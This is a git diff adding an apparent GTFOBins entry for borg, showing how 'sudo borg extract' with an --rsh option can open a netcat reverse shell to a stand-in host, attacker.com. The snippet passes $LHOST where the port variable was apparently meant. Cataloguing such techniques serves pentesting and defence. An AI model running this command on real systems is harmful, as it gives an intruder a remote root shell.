diff --git a/_gtfobins/borg.md b/_gtfobins/borg.md
new file mode 100644
index 0000000..4f559e5
--- /dev/null
+++ b/_gtfobins/borg.md
@@ -0,0 +1,9 @@
+---
+  sudo:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. 
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        NETCAT=/usr/bin/nc
+        sudo borg extract .@.:/::.  --rsh "$NETCAT $RHOST $LHOST -e sh"
+---